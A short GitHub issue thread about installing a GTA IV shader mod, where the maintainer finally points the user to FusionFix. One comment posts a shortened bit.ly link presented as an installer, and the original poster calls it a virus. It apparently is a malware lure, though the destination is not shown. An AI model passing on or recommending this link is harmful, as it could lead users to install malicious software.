### ISSUE TITLE
[Question] How to install this?

### ISSUE THREAD

**Issue by Ex3cutionerX** [Parallellines0451/GTAIV.EFLC.FusionShaders#48]
How can i install this on my 1.0.7.0 Gta IV with fusion fix? the readme don't help much. When i extract all the files and open the buildshaders.bat it creates a update folder with a small 2kb file named stipple.wtd, is that it? i just have to put this update folder on the root of my GTA IV?

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Ex3cutionerX** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

This is a virus, go to hell dumbass.

**Comment by Parallellines0451** [comment]
Use [FusionFix](https://github.com/ThirteenAG/GTAIV.EFLC.FusionFix)
